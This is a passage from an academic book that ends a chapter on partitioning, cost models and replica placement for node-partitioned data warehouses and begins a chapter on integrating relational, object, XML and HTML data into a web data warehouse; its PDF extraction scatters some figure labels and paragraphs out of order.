We use the strategy proposed in Furtado (2004c). The partitioning algorithm is: 1. Dimensions: Small dimensions are replicated into every node (and optionally cached into memory). Nonsmall dimensions can simply be hash-partitioned by their primary key. This is because that attribute is expected to be used in every equi-join with facts, as the references from facts to dimensions correspond to foreign keys. The determination of whether a dimension is small can be cost-based or, for simplicity, based on a user-defined threshold (e.g., every relation with less than 250 MB is to be replicated and those with less than 100 MB are to be cached into memory for faster access). For our experiments we have used this simple approach, but we describe a cost model and discuss the search for optimal partitioning in the next section. 2. Facts: The objective is to find the hashpartitioning attribute that minimizes repartitioning costs. A reasonable approximation to this objective is to determine the most frequent equi-join attribute used by the relation. To do this, the partitioning strategy looks at the frequency of access to other partitioned relations and chooses the most frequent equi-join attribute with those relations as the partitioning attribute.
668
We have described this process in the second section. A more complex approach involves the search for optimal partitioning, as described in the next section. By co-locating relation fragments that are frequent equi-join targets, this simple strategy reduces significantly repartitioning requirements (we have determined experimentally that WBP achieves an improvent of about 50% over straightforward primary-key based partitioning (PK) when executing the query of Figure 5 under the same conditions described later in the experiments). Figure 7 shows the partitioning that resulted from applying the WBP strategy to TPC-H query set. Concerning the execution plan of Figure 4b, this strategy allows joins LI to O and LI-O-P-S to PS to be processed as LocalJ. Repartitioning is necessary only for intermediate dataset LI-O. •
WBP with bitmap join indexes (WBP+JB): We have materialized join bitmaps in every node for attributes (p_brand, n_name, o_orderpriority, ps_availqty) to speed up the query of Figure 5. For instance, before scanning the LI relation, the associated bitmap join indexes such as the one for Brand x is scanned. This way, only the LI rows associated with Brand x are processed any further, including repartitioning data.
Efficient and Robust Node-Partitioned Data Warehouses
In the next section we review a generic cost model for the strategies, taking into account factors such as the number of nodes and network bandwidth.
COST MODEL The main processing costs (listed next) are repartitioning, data communication, local processing, and merging: a.
b.
c.
d.
Repartitioning cost (RC): Partitioning a relation consists of retrieving the relation from secondary memory, dividing it into fragments by applying a hash function to a join attribute, and assigning buffers for the data to send to other nodes. Repartitioning is similar but involves a fragment in each node. Multiple nodes can rehash and exchange relation fragments simultaneously. Data communication cost (DC): The data communication cost is monotonically increasing with the size of the data transferred. We assume a switched network, as this allows different pairs of nodes to send data simultaneously (with no collisions). This, in turn, allows the repartitioning algorithm to be implemented more efficiently. Local processing cost (LC): The local processing cost for the join operation typically depends on whether the join is supported by fast access paths such as indexes and the size of the relations participating in the join. For simplicity, we assume these costs also increase monotonically on the relation sizes, although, in practice, this depends on several parameters, including memory buffer size. Merging cost (MC): The merging cost is related to applying a final query to the collected partial results at the merging node. We do not consider this cost as it is similar in every case and independent of the other ones.
Given these items, the next objective is to represent the cost as an expression involving the local processing and repartitioning costs (here we consider the data communication cost within the repartitioning cost). We define weighting parameters as in Sasha et al. (1991): a partitioning cost weight, β, and a local processing cost weight, α, so that β/α denotes the ratio of partitioning costs to local processing costs, for example, ~2 (Sasha et al., 1991). A cost-based optimizer is used to determine the most appropriate execution plan (Kossman & Stocker, 2000; Steinbrunn et al., 1997). A join order determines the order by which relations are joined. Assuming the datasets are joined using an algorithm such as parallel hybrid hash-join, at each step an additional relation is joined to the current intermediate result set IRi (selection and projection operators are applied as soon as possible to reduce the size of the datasets that need to be processed). Given the result set IRi and a relation Rj, equations (1) and (2) represent the processing costs for a single server and a node-partitioned system where Rj is replicated into all nodes and IRi is partitioned: one server system : α × (IRi + R j )
(1)
⎛ IR ⎞ replicated join : α × ⎜ i + R j ⎟ ⎝ N ⎠
(2)
Equations (3) and (4) represent the local processing cost (LC) and repartitioning cost (RC) when both datasets are partitioned. The RC cost in (4) is only incurred when the datasets are not co-located. ⎛ IR R ⎞ LC for local join : α × ⎜⎜ i + j ⎟⎟ ⎝ N N⎠
(3)
IR ⎛ IR ⎞ RC non – colocated data sets : β× ⎜ i − i2 ⎟ ⎝N N ⎠
(4) The value IRi/N in equation (4) is the fraction of the IRi that is at each node and IRi/N2 is the fraction of that quantity that already has the cor-
669
Efficient and Robust Node-Partitioned Data Warehouses
rect hash-value for that node, therefore requiring no repartitioning. By subtracting (3) from (2) we get the advantage of partitioning over replicating when both datasets are co-located. However, if the datasets are not co-located, we must subtract equation (4) from this value. If β is large (small available bandwidth), this RC cost can become dominant and replication becomes the best choice. The WBP strategy improves the performance of the system by making each node process 1/N of relations and intermediate results as much as possible (3) and simultaneously reducing repartitioning requirements (4) by placing datasets based on the workload. On the other hand, PRS focuses on eliminating repartitioning requirements (4) to handle contexts with low bandwidth, but on the other hand, it needs to process whole relations (2). Finally, WBP-JB uses bitmaps over the nodes to avoid the repartitioning cost (4) (and simultaneously also reducing local processing costs). Given a cost model, a cost-based optimizer evaluates the cost of alternative execution plans (including join orders) for alternative partitioning options (partition or replicate relations). In practice, this cost model is replaced by evaluating the cost of operations as our simulator described next does.
COMPARATIVE ANALYSIS OF PARTITIONING ALTERNATIVES The partitioning strategies described before can be characterized as more replication-oriented (PRS, PFRD-H) and more partitioning-oriented (WBP, WBP+JB) ones. Partitioning-oriented strategies are very efficient in an environment with fast interconnections and available bandwidth, because repartitioning is cheap in those environments. On the other hand, the advantage of PRS (and PFRD-H) is that it places lower requirements on the interconnections, with fewer data exchange requirements. However, the drawback is the size of replicated relations that must be processed in
670
every node. Our comparative analysis is based both on a simulator environment, to test several possible configurations (e.g., number of nodes, available bandwidth) and actual executions to help validate the results and analyze the strategies for TPC-H query set. We have built a discrete-event simulation environment, which uses a basic set of parameters listed in Figure 8. The simulator estimates the cost of individual operations that need to be performed to execute the query. Operation tasks are submitted as required and resource utilization for disk access, memory and bus, processor, and network send/receive are used to determine completion time for those tasks. For instance, the cost of a hybrid hash-join is related to the cost of scanning the relations from secondary storage, bucketizing them, building a hash table, and probing into the hash table. For instance, the cost to join relations R1 and R2 considering the individual scan costs is scanR1 + scanR2 + 2(scanR1 + scanR2) (1-q), where q denotes the fraction of R1 whose hash-table fits in memory (Steinbrunn et al., 1997). Disk access rates (measured in MB/sec) are then used to complete the evaluation of the cost. Similar strategies are applied to evaluate the repartitioning cost, which involves scanning the datasets, operating on them, assigning buffers, and sending to destination nodes (with given network bandwidth in MB/sec). A typical number of instructions used to process different low-level operations and to send and receive messages (Network) were included as a parameter to the simulator (Stöhr, Märtens & Rahm, 2000). For these experiments we used a TPC-H with 100 GB and generic query Qa of Figure 5a, with default selectivity for attribute values (x, y, w, z ) of (0.7, 0.7, 0.2, 0.2) respectively. Figure 9 shows the response time (a) and speedup (b) vs. the nº of nodes for query Qa. The performance of replica-based strategies (especially PRS) is much worse than partitioningbased ones (WBP, WBP+JB), because nodes have to process large replicated datasets. Additionally,
Efficient and Robust Node-Partitioned Data Warehouses
Figure 8. Basic parameters for simulation Disk
Processing
Nº Instrs. Network
read page
3,000
connection speed (default)
100 MB/s
settle time + ctrller per access 3 ms + delay 1 ms per page
process bitmap page
1,500
send message
1,000 + #B instructions
Seq. transfer rate / node
100MB/s
extract & hash/probe table row
250
receive message
1,000 + #B instructions
CPU speed
50 MIPS
message size 128 B (small)
Memory Buffer
500MB/node
message size 1 page (4 KB) (large)
seek time
10 ms
Figure 9. Response time and speedup VS Nº of nodes (100 MB/s) (log-plots): (a) RT vs Nº of nodes and (b) speedup vs nº of nodes 1000 PRS Speedup
response time (secs)
1000
100
100
PFRD-H WBP
10
WBP+JB
10 10
25
50
75
100
250
nº of nodes
(a)
(WBP+JB) improves response time further, as early-selection functionality reduces the amount of data that must be processed and repartitioned. Of course bitmap join indexes must be available and their usefulness depends on the selectivity of query select conditions. On the other hand, if the available network bandwidth is low, strategies using replicas (e.g., PRS, PFRD-H) can exhibit better performance relative to those relying on partitioning (WBP), as shown in Figure 10a. Still, early-selection (WBP+JB) was the best strategy because it is not very dependent on repartitioning. We also subjected our simulator to conformance tests, to evaluate whether its simulation is sufficiently accurate for our purposes. Figure 11
1 10
25
50 75 100 nº of nodes
250
(b)
shows a result from those tests. We ran WBP and PRS on a system with the characteristics: TPC-H 25GB; commercial DBMS; each node with 3 GHz Intel Pentium 4 processor; 1 GB memory; 200 GB SATA II disk; 1 GB/s network; query Qa). Costbased optimization was used, the schema objects were analyzed and the best query plan suggestion was chosen (the default execution plan had very bad performance for PRS). The results show that the simulated response time was reasonably accurate. Although its prediction for PRS was slightly higher than the actual response time for a number of nodes above 100, the advantage of WBP is still very evident from these results. Finally, we also ran the whole TPC-H query set against WBP and PRS to compare replica-
671
Efficient and Robust Node-Partitioned Data Warehouses
Figure 10. RT vs. Mbps (100 nodes)
Figure 11. Simulation vs. real execution (25 GB, 1Gbps) WBP-real PRS-real WBP-simula PRS-simula
responset time (secs)
response time (secs)
10000 PRS 1000
PFRD-H WBP
100
WBP+JB
800 600 400 200 0
10
10 1
10
Mbps
100
50 100 nº of nodes
1000
200
Figure 12. Size and layout of relations involved in parallel join over PRS G1
G2
G3
G4
Partitioned
Partitioned + Medium Replicated
Partitioned + Large Replicated
Partitioned + Large Replicated + Medium Replicated
Q1, Q6, Q15
Q11,Q14,Q19
Q3, Q5, Q7, Q9, Q10, Q12, Q16
Q4, Q8, Q13, Q22
Figure 13. Grouped speedup results for PRS and WBP over 25 nodes
Speedup / 25
40
PRS
WBP
30 20 10 0 G1:Partitioned
G2:Partitioned + Medium Replicated
tion vs. partitioning on the following system: 25 nodes; TPCH 50 GB; each node with Pentium III 866 MHz CPU; 80 GB IDE hard disks; 512 MB of RAM; 100 MB/s switched network). For these results we consider TPC-H query set divided into groups (Figure 12) according to sizes of replicated relations accessed and processed by the joins. Group G1 accesses only a partitioned relation (LI or PS). The other groups include references to replicated relations with sizes in the following intervals:* Small: (0, 500MB); Medium: (500 MB, 5 GB); Large (5 GB, ∞). The speedup intervals (T lines) of Figure 13 are the range of speedup values considering all 672
G3:Partitioned + G4:Partitioned + Large Replicated Large Replicated + Medium Replicated
queries in a group. From the results we can see that the larger the replicated relations, the smallest the PRS speedup (G2, G3, and G4), with a large penalty for processing heavy ReplicaJ joins. WBP achieved a near-to-linear speedup for all queries, while PRS revealed very low speedup for most queries.
REPLICATION FOR NONSTOP AVAILABILITY ON NPDW In this section we discuss briefly alternative replication choices within the NPDW for always-on,
Efficient and Robust Node-Partitioned Data Warehouses
always efficient processing and allowing multiple nodes off-line simultaneously for data loading, maintenance, and other DBA functionality. Figure 14 shows the schema of a node X with availability-related replica from another node Y. Notice that some relations are already replicated by placement (S and C). Node X can now replace node Y in case of unavailability of Y by simply including Y partitions in the processing. The simplest replica placement strategy involves replicating each node’s data into at least one other node—full replicas (FRs). In case of failure of one node, a node containing the replica resumes the operation of the failed node. A simple placement algorithm considering R replicas is:
twice as much data (2/N), even though all the other nodes will process only 1/N. The replica effort is placed on a single node, even though other nodes are less loaded. An alternative to full replicas is to use fully partitioned replicas (FPR)—replicas are partitioned into as many slices as there are nodes minus one. If there are N nodes, a replica is partitioned into N-1 slices and each slice is placed in one node. The replica of node i is now dispersed into all nodes except node i. In order to allow up to R nodes to become unavailable, there must be R nonoverlapping replica slice sets. Two replicas are nonoverlapped if the equivalent slices of the two replicas are not placed in the same node. The following placement algorithm is used:
Number nodes linearly; For each node i For (replica =1 to R) data for node i is also placed in node (i+R) MOD N;
Number nodes linearly; The copy of the data of node i is partitioned into N-1 numbered slices, starting at 1. For j=0 to R:
This simple strategy allows the system to work with unavailable nodes and it is possible to take more than one node off-line simultaneously. The major drawback is processing efficiency when unavailability of a few nodes occur: consider a NPDW system with N homogeneous nodes. Although normally each node contains and processes about 1/N of the data, if one node fails, the node replacing it with a replica will have to process
For (slice x from 1 to N-1) Place slice x in node (i+j+ x) MOD N
This strategy is the most efficient because, considering N nodes, each replica slice has 1/(N1) of the data and each node has to process only that fraction in excess in case of a single node becoming unavailable. However, all nodes that remain active are needed to process a slice from
Figure 14. Schema in node X with replicated schema from node Y
673
Efficient and Robust Node-Partitioned Data Warehouses
The data for node i is partitioned into X slices starting at 1; For slice set j = 0 to R For (slice x from 1 to X) Place slice x in node (i+j+ x) MOD N
Figure 15 compares the response time (line) for query TPC-H Q9 and the minimum number of replicas needed (bars) when 5 out of 20 nodes are off-line using full replicas (FRs), fully partitioned replicas (FPRs), and partitioned replicas (PRs). These results were obtained in a system with the characteristics: 50 GB TPC-H; 20 nodes, each with 866 MHz processor; 512 MB RAM). The alternatives compared are: online—every node is online; FPR—fully partitioned replicas; PR(10)—partitioned replicas with two groups of 10 nodes; PR(5)—partitioned replicas with 4 groups of 5 nodes. These results show the much larger penalty incurred by FR and the excessive number of replicas required for FPR to allow 5 nodes off-line simultaneously. PR(10) (partitioned replicas with two 10 element groups) is a good choice, as it requires a single replica and obtains a good response time simultaneously.
FUTURE TRENDS The NPDW is the basic design for the Data Warehouse Parallel Architecture Project (DWPA, 2005), which focuses on architectural characteristics, automatic reorganization, load balancing, response time prediction, and automatic adaptability for the low-cost node-partitioned data warehouse. These are in line with current and future trends on database research in related issues, which include database self-tuning and autoconfiguration (Chaudhuri & Weikum, 2002; Schiefer & Valentin, 1999; Weikum, Moenkeberg, Hasse, & Zabback, 2002). Runtime prediction is also an important objective for current and future research on database engines. There are very interesting recent works on runtime estimation and improvement (Chaudhuri, Narasayya, & Ramamurthy, 2004; Luo, Naughton, Ellmann, & Watzke, 2004) that can be usefully adapted to parallel settings and in particular to the NPDW environment. There is nowadays a market trend
Figure 15. Response time and replicas when 5 out of 20 nodes are off-line (average over TPC-H) Nº of Replicas Response Time (min:sec) 6
34:34
4
23:02
2
11:31
0
00:00 online
674
FPR PR(10) PR(5)
FR
response time (min:sec)
Number nodes linearly;
Given these results, we conclude that replicas partitioned by groups are the most advantageous alternative for NPDW if we consider both performance and flexibility in allowing multiple nodes to be taken off-line simultaneously for maintenance and loading reasons.
nr of replicas
the replica. In order to allow up to R nodes to become unavailable, there must be R nonoverlapping replica slice sets. If we desire y nodes to be able to be off-line simultaneously when a single replica is used, then the y nodes must not contain replica slices of each other. Partitioned replicas (PRs) guarantee this by creating groups and placing replica slices from one group in a different group. This way we can take a whole group off-line simultaneously for maintenance or other functionality, because the complete set of replica slices are elsewhere. This strategy is a hybrid between FPR and FR. If replicas are partitioned into x slices, we denote it by PR(x). If x = N, we have a fully partitioned replica. A very simple algorithm to generate less than N slices is:
Efficient and Robust Node-Partitioned Data Warehouses
towards more and more open-source software, including open-source database engines being deployed in organizations and cost-consciousness in both hardware and software platforms is increasingly important. In this context, the DWPA concept of an architecture that can run anywhere efficiently and adaptively also seems to be in line with current trends. Besides, many of the issues discussed in this chapter can also be applied to other parallel architectures that are increasingly deployed, in particular symmetric multiprocessors (SMP) and clusters of SMPs.
CONCLUSION We have discussed design issues for low-cost alternatives to specialized, fast, and fully-dedicated parallel hardware to handle large data warehouses. The idea is to design the system with special care concerning partitioning for placement and reorganization and also concerning availability. Alternative partitioning strategies were proposed and their performance compared. We have tested replica-based and partitioned-based strategies and analyzed their performance vs. the number of nodes and available network bandwidth. We also tested the use of early selection with join bitmaps as an approach to overcome extra overheads related to repartitioning and overall processing. We concluded that workload-based partitioning is a suitable strategy, and join bitmaps not only improve speedup but also prevent significant slowdown when the available network bandwidth is low. We have also described replication-based availability that allows always-on behavior and efficiency when multiple nodes are taken off-line.
ACKNOWLEDGMENTS This work was supported in part by the Portuguese “Fundação para a Ciência e Tecnologia,” under project POSC/EIA/57974/2004.
REFERENCES Bernstein, P. A., & Chiu, D. M. (1981). Using semi-joins to solve relational queries. Journal of the ACM, 28(1), 25-40. Chan C.-Y., & Ioannidis, Y. E. (1998). Bitmap index design and evaluation. In Proceedings of the International Conference on the Management of Data (pp. 355-366). Chaudhuri, S., Narasayya, V., & Ramamurthy, R. (2004). Estimating progress of execution for SQL queries. In Proceedings of the ACM International Conference on Data Management, Paris. Chaudhuri, S., & Weikum, G. (2002). Rethinking database system architecture: Towards a self-tuning, RISC-style database system. In Proceedings of Very Large Databases Conference. Copeland, G., & Keller, T. (1989). A comparison of high-availability media recovery techniques. In Proceedings of the ACM International Conference on Management of Data. Coulon, C., Pacitti, E., & Valduriez, P. (2004, June 28-30). Scaling up the preventive replication of autonomous databases in cluster systems. In Proceedings of the 6th International Vecpar Conference, Valencia, Spain. DeWitt, D., & Gray, J. (1992). The future of high performance database processing. Communications of the ACM, 35(6). DWPA. (2005-2008). Fundação para a Ciência e a Tecnologia (Research and Development Project POSI/EIA/57974/2004 of FCT), Portugal. Furtado, P. (2004a, July). Hash-based placement and processing for efficient node partitioned query-intensive databases. In Proceedings of the Tenth International Conference on Parallel and Distributed Systems (pp. 127-134). Newport Beach, California.
675
Efficient and Robust Node-Partitioned Data Warehouses
Furtado, P. (2004b, September). Workload-based placement and join processing in node-partitioned data warehouses. In Proceedings of the International Conference on Data Warehousing and Knowledge Discovery (pp. 38-47).Zaragoza, Spain. Furtado, P. (2004c, November). Experimental evidence on partitioning in parallel data warehouses. In Proceedings of the ACM DOLAP 04 Workshop of the International Conference on Information and Knowledge Management, Washington. Furtado, P. (2005a, May). Efficiently processing query-intensive databases over a non-dedicated local network. In Proceedings of the 19th International Parallel and Distributed Processing Symposium, Denver, Colorado. Furtado, P. (2005b, April). The issue of large relations in node-partitioned data warehouses. In Proceedings of the International Conference on Database Systems for Advanced Applications, Beijing, China. Furtado, P. (2005c, August). Replication in node partitioned data warehouses. In Proceedings of the VLDB Ws. on Design, Implementation, and Deployment of Database Replication, Trondheim, Norway. Hsiao, H., & DeWitt, D. (1990a). Chained declustering: A new availability strategy for multi-processor database machines. Paper presented at the International Conference on Data Engineering. Hsiao, H., & DeWitt, D. (1990b). Replicated data management in the Gamma Database Machine. Paper presented at the Workshop on the Management of Replicated Data. Hsiao, H., & DeWitt, D. J. (1991). A performance study of three high availability data replication strategies. In Proceedings of the Parallel and Distributed Systems. Hua, K. A., & Lee, C. (1990, August). An adaptive data placement scheme for parallel database
676
computer systems. In Proceedings of the Sixteenth Very Large Data Bases Conference (pp. 493-506). Brisbane, Queensland, Australia. Kimball, R., Reeves, L., Ross, M., & Thornthwaite, W. (1998). The data warehouse life cycle toolkit. John Wiley & Sons. Kitsuregawa, M., Tanaka, H., & Motooka, T. (1983). Application of hash to database machine and its architecture. New Generation Computing, 1(1), 63-74. Lin, Y., Kemme, B., & Jimenez-Peris, R. (2005, August 30-September 2). Consistent data replication: Is it feasible in WANs? In Proceedings of the 11th International Europar Conference, Lisboa, Portugal. Luo, G., Naughton, J. F., Ellmann, C. J., & Watzke, M. W. (2004). Toward a progress indicator for database queries. In Proceedings of the ACM International Conference on Data Management, Paris. O’Neil, P., & Graefe, G. (1995). Multi-table joins through bitmapped join indices. SIGMOD Record, 24(3), 8-11. Pacitti, E., Özsu, M., & Coulon, C. (2003, August 26-29). Preventive multi-master replication in a cluster of autonomous databases. In Proceedings of the 9th International Europar Conference, Klagenfurt, Austria. Patterson, D. A., Gibson, G., & Katz, R. H. (1998, June). A case for redundant arrays of inexpensive disks (raid). In Proceedings of the International Conference on Management of Data (pp. 109116). Chicago. Rao, J., Zhang, C., Megiddo, N., & Lohman, G. (2002, June). Automating physical database design in a parallel database. In Proceedings of the ACM International Conference on Management of Data (pp. 558-569). Madison.
Efficient and Robust Node-Partitioned Data Warehouses
Rousopoulos, R. (1998). Materialized views and data warehouses. SIGMOD Record, 27(1), 21-26.
TPC. (1999, June). TPC Benchmark H, Transaction Processing Council. Retrieved June 13, 2006, from http://www.tpc.org/
Saborit, J. A., Mulero, V. M., & Pey, J. L. (2003). Pushing down bit filters in the pipelined execution of large queries. In Proceedings of the International Conference Europar (pp. 328-337).
Valduriez, P., & Ozsu, M. (1999). Principles of parallel and distributed database systems (3rd ed.). Prentice Hall.
Schiefer, B., & Valentin, G. (1999). DB2 universal database performance tuning. IEEE Data Engineering Bulletin, 22(2), 12-19. Shatdal, A., & Naughton, J. (1995, May 22-25). Adaptive parallel aggregation algorithms. In Proceedings of the 1995 International Conference on Management of Data, San Jose, California (pp. 104-114).
Weikum, G., Moenkeberg, A., Hasse, C., & Zabback, P. (2002). Self-tuning database technology and information services: From wishful thinking to viable engineering. In Proceedings of the Very Large Databases Conference. Williams, M., & Zhou, S. (1998). Data placement in parallel database systems: Parallel database techniques. IEEE Computer Society Press (pp. 203-219).
Stöhr, T., Märtens, H., & Rahm, E. (2000). Multidimensional database allocation for parallel data warehouses. In Proceedings of the 26th International Conference on Very Large Databases (VLDB), Cairo, Egypt.
Yu, C. T., Guh, K. C., Brill, D., & Chen, A. L. P. (1989, June). Partition strategy for distributed query processing in fast local networks. IEEE Transactions on Software Engineering, 15(6), 780-793.
Tandem. (1987, September). NonStop SQL, a distributed, high-performance, high-reliability implementation of SQL. Paper presented at the Workshop on High Performance Transactional Systems, California.
Yu, C. T., & Meng, W. (1998). Principles of database query processing for advanced applications. Morgan Kaufmann.
Zilio, D. C., Jhingran, A., & Padmanabhan, S. (1994). Partitioning key selection for a sharednothing parallel database system (IBM Research Rep. No. RC 19820 (87739)). IBM.
This work was previously published in Data Warehouses and OLAP: Concepts, Architectures and Solutions, edited by R. Wrembel and C. Koncilia, pp. 203-229, copyright 2007 by IRM Press (an imprint of IGI Global).
677
678
Chapter 2.15
Web Data Warehousing Convergence:
From Schematic to Systematic D. Xuan Le La Trobe University, Australia J. Wenny Rahayu La Trobe University, Australia David Taniar Monash University, Australia
ABSTRACT This article proposes a data warehouse integration technique that combines data and documents from different underlying documents and database design approaches. The well-defined and structured data such as relational, object-oriented and object relational data, semi-structured data such as XML, and unstructured data such as HTML documents are integrated into a Web data warehouse system. The user specified requirements and data sources are combined to assist with the definitions of the hierarchical structures, which serve specific requirements and represent a certain type of data semantics using object-oriented features including inheritance, aggregation, association, and collection. A conceptual integrated data warehouse model is then specified based
on a combination of user requirements and data source structure, which creates the need for a logical integrated data warehouse model. A case study is then developed into a prototype in a Web-based environment that enables the evaluation. The evaluation of the proposed integration Web data warehouse methodology includes the verification of correctness of the integrated data, and the overall benefits of utilizing this proposed integration technique.
INTRODUCTION AND MOTIVATION Currently, there are more and more techniques being provided to accommodate the high demand for exchanging and storing business information including Web and operational data. While the
well-defined structured data are operated and stored in relational, object-oriented (Buzydlowski, 1998), object relational database environments, semi-structured data in XML or unstructured documents are stored in HTML. The problem of related information being separated and stored in multiple places happens quite often within an organization. Information from these applications is extracted and further developed into business analysis tools such as OLAP and data warehousing, which aim to support data analysis, business requirements, and management decisions. Relevant business Web data have rapidly increased in significant amounts. Recently, XML has increased in popularity and has become a standard technique for storing and exchanging information over the Internet. The data integration (Breitbart, Olson, & Thompson, 1986) in the data warehousing has certainly received a lot of attention. There are three particular articles that are very close to the work in this article. Jensen, Moller and Pedersen (2001) allow an integration of XML and relational data. Even though the object-oriented concept is used in this model, the semantic contribution in this work lacks objectoriented features. Therefore, the semantics of data have been only partially supported. Other systems (Golfarelli, Rizzi, & Birdoljak, 1998, 2001; Huang & Su, 2001) focus on supporting Web data at the schematic level. While their initial focus is to incorporate XML data, Relational data have also been mentioned but not yet been incorporated. They mostly concentrate on the creation of a logical model. Hence, it is clear that there is yet to be developed a standard integration technique that provides a means of handling multiple data sources being integrated into a data warehouse system (Bonifati, Cattaneo, Ceri, Fuggetta, & Paraboschi, 2001), and allowing a full capture of semantics of data in the data source models. The purpose of this article can be summarized as follows:
•
•
•
•
To ensure the integration technique allows a meaningful uniformed integrated objectoriented data warehouse structure. To ensure the integrated data and their semantics are explicitly and fully represented. To ensure a proposed integrated data warehouse system with consistency and high quality. To ensure the correctness of integrated data and benefits such as usefulness of the proposed integrated data warehouse system.
Figure 1 shows an overview of the proposed works in this article. The integration technique starts with a conceptual integrated data warehouse model (Ezeife & Ohanekwu, 2005) where the user requirement and underlying data source structures are used to assist with the design. The integrated Web data warehouse conceptual model deals with class formalization and hierarchical structures. The specified conceptual integrated Web data warehouse model has created a need for an integrated Web data warehouse logical model where underlying source structures are then absorbed and specified onto the existing conceptual Web integrated Web data warehouse model. The proposed Web integrated data warehouse models are then translated into a suitable
Figure 1. Integration Web data warehouse overview User requirement and underlying data sources
Proposed Integration ? ANALYSIS, INTEGRATION
Object Oriented Data Warehouse Model
Object Relational ImplementationReady Format
Evaluation
?
Correctness and Efficient Performance
679
Web Data Warehousing Convergence
implementation format, which enables a prototype to be developed. In order to confirm the efficiency of the proposed integration technique, a verification of integrated data is for the purpose of confirming the correctness and quality in the integrated data. This is done so that for each query requirement, a query is issued to access the integrated data warehouse system, and a set of queries access independent systems. The result that is obtained by the query that accessed the integrated data warehouse system is equivalent with the accumulative result that is obtained by queries that access one or more data source systems. The verification of the result would confirm the correctness and consistent quality of the integrated data alone, and the integration technique in general.
A SURVEY OF EXISTING DATA WAREHOUSE INTEGRATION APPROACHES The existing approaches are classified into three categories. Table 1 briefly summarizes the existing approaches by category. Category 1 includes the existing integration technique that can integrate only relational data into a data warehouse system. A data integration problem solved by proposing two approaches, namely, declarative and procedural can be found in the works of Calvanese, Giacomo, Lenzerini, and Rosati, (1998) and Lenzerini (2002) where as Cabibbo and Torlone (1998) and Gopalkrishman, Li, and Karlapalem (1998) propose different techniques to integrate data that are based on the requirements gathered from the user specification and also from studying the conceptual design of the operational source data. In order to create the model, a matching of requirements to sources is needed before creating fact and dimensions. Category 2 shows techniques for handling complex information, which are different from the techniques that handle simple data types, which are available in the relational database. An object 680
data warehouse approach allows an integration of both simple and complex data types. Its main function is to accomplish all important objectoriented concepts and additional features such as object ID and persistent object handling. An object-oriented model extends the technique to handle the transition from relational data to object data (Filho et al., 2000; Gopalkrishman et al., 1998; Hammer, Garcia-Molina, Widom, Labio, & Zhuge, 1995; Huynh et al., 2000). However, the proposed model lacks a utilization of object-oriented features that result in insufficient representation of the semantics. Miller et al. (1998) introduce an object view in the mapping technique. They adopted the extensive view system to create views. However, views creation depends on the number of base classes. Category 3 has allowed the data integration to move on to an advanced level where XML data is the main motivation. Web data nowadays can easily be found in XML structure, which has many possibilities for data modeling. This is because XML is well designed to support object-oriented modeling concept; the data semantics are very rich. Therefore, techniques for integrating XML data into a data warehouse system (Nassis et al., 2005; Rusu, Rahayu, & Taniar, 2004, 2005) needs to take more cautious because unlike relational and object data, XML data are classified as semi-structure. While Golfarelli et al. (2001) try to deal with DTD and XML schema, Jensen et al. (2001) propose query to distribute XML data to an OLAP database according to the data representation. Part of our work is very much similar to the work of Jensen et al. (2001), we consider both XML and relational data for integration, and we also combine user requirements and underlying data structures to assist with the design. The difference between our work and the rest is that now we are handling three categories simultaneously. Not only are relational and XML data being considered, we also consider object data and other Web data structure such as HTML.
Web Data Warehousing Convergence
Table 1. Categorization and summary of existing work Integration Methodology Author(s)
Conceptual
Logical
Analysis and Comments
1. Integrated Relational Data in Data Warehousing Gupta and Mumick (1995)
Calvanese et al. (1998)
Reasoning techniques
Cabibbo et al. (1998); Gopalkrishman et al. (1998)
Relational star schema and goaldriven analysis
Views
Map local source structures to global views to accomplish specific needs.
Declarative & procedural
Rewrite queries procedurally to declare relationships between data sources structure and data warehouse structure. Specify user-requirements on a star schema. Apply goal-driven analysis for selecting information to the target schema.
2. Integrated Relational and Object Data in Data Warehousing Chen, Hong, and Lin (1999); Filho, Prado, and Toscani (2000); Mohamah, Rahayu, and Dillon (2001) Miller, Honavar, Wong, and Nilakanta (1998); Serrano, Calero, and Piattini (2005) Gopalkrishman et al. (1998). Huynh, Mangisengi, and Tjoa (2000).
Lack semantic representations. Use only an aggregation modeling feature to represent the data.
Object-oriented model Mapping object views Objectoriented model Object-oriented model and mapping object methodology
Extensive views allow various levels mapping. Develop a prototype to materialized views. Lacked semantic representations. Use only inheritance modeling features to represent the data. The reversible mapping from object to relational environment causes possible lost of data semantics.
3. Integrated Relational, Object, and Web Data (HTML/XML) in Data Warehousing Golfarelli et al. (2001)
Jensen et al., (2001). Byung, Han, and Song (2005); Nummenmaa, Niemi, Niinimäki, and Thanisch (2002) Nassis, Rahayu, Rajugan, and Dillon (2004)
Attributes tree model UML model
Relational star schema UML Model
PROBLEM DEFINITION AND BACKGROUND Identified Problems Schemas The most popular existing model in data warehousing is the star schema. The star schema allows
Integrate XML data based on DTD and XML schema. Lack of data representation showing only aggregation relationship. Address both XML and relational data. Enable query to distribute XML data in OLAP database Address only XML data. Specify user-requirement and XML structures on the object -oriented model.
business requirements to be organized and represented in a fact and dimensions surrounding fact. Dimensions are modeled on a flat level; therefore, it limits the data representations for both relationships and business requirements. Unlike the star schema, the snowflake or star flake schema provides modeling of hierarchical relationships within the dimensions. The existence of hierarchies in the dimensions stores the whole
681
Web Data Warehousing Convergence
attribute hierarchically and shows only one type of relationship, which is association. While it improves on the modeling representation, it creates more data-model complexity and therefore introduces implemental complexities. The integration of the real world problems can be represented in a multidimensional model that consists of dimensions and fact using the hierarchical concept. Allowing for hierarchies in the dimensions would reduce the complexity of snowflake and star flake to a more efficient and clean integrated model while still being able to achieve a full data semantic capture.
Data Retrieval The translation of the integrated data warehouse model into an implementation-ready format aims to address the adaptation of the object-oriented modeling concept into an implementation database environment where both object data and relational structures are maintained. Retrieved information must be correct and consistent in this proposed implementation when complex queries are specified in OLAP components. Performance of complex queries must be achievable in an efficient data accessing manner against the existing complex queries of the existing systems.
Background We adopt object-oriented features, a semantic network diagram, and the TKPROF utility to assist with our strategy for solving the problem. They are briefly described as follows: •
682
Object-oriented design concept: The powerful features have allowed a problem to be modeled in much better semantics representations. Collection type allows the multi-values attribute to handle the storing of data in a more efficient manner using ROW, SET, and ARRAY. Features like aggregation allow a whole problem to be modeled as
